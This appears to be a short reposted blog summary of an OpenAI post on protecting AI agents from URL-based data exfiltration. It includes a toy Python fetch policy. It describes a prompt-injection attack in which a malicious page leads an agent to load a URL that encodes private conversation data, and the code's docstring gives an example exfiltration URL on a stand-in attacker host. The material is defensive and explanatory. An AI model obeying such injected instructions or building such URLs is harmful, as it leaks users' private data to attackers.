Keeping your data safe when an AI agent clicks a link
- lastmansurfing
- 11 hours ago
- 1 min read

AI systems are getting better at taking actions on your behalf: opening a web page, following a link, or loading an image to help answer a question. These useful capabilities also introduce subtle risks that we work tirelessly to mitigate.
This post explains one specific class of attacks we defend against, URL-based data exfiltration, and the safeguards we've built to reduce the risk when ChatGPT (and agentic experiences) retrieve web content.
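To make the attack class concrete: in a URL-based exfiltration attack, a malicious page instructs the agent to load a link or image whose URL encodes private conversation data, so that merely fetching it leaks the data to the attacker's server. The full post describes OpenAI's actual safeguards; the snippet below is only a minimal illustrative sketch of one common mitigation idea, a conservative fetch policy that refuses attacker-shaped URLs. The function name and policy details are hypothetical, not OpenAI's implementation.

```python
from urllib.parse import urlsplit

def is_safe_to_fetch(url: str, user_provided_urls: set[str]) -> bool:
    """Toy fetch policy (illustrative only, not OpenAI's actual safeguard).

    Allow a URL only if the user explicitly supplied it, or if it is a
    bare link (no query string or fragment) on a host the user already
    referenced. Query strings are the classic exfiltration channel:
    an injected page can ask the agent to load
    https://evil.example/pixel.png?data=<secret>, smuggling the secret
    out as a URL parameter.
    """
    if url in user_provided_urls:
        return True  # the user typed this exact URL themselves
    parts = urlsplit(url)
    if parts.query or parts.fragment:
        return False  # could carry encoded conversation data
    trusted_hosts = {urlsplit(u).netloc for u in user_provided_urls}
    return parts.netloc in trusted_hosts
```

A real defense layers far more than this (link rendering rules, allowlists, human confirmation for sensitive actions), but the sketch shows why the URL itself, not just the page content, is the attack surface.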
Read the full story | OpenAI



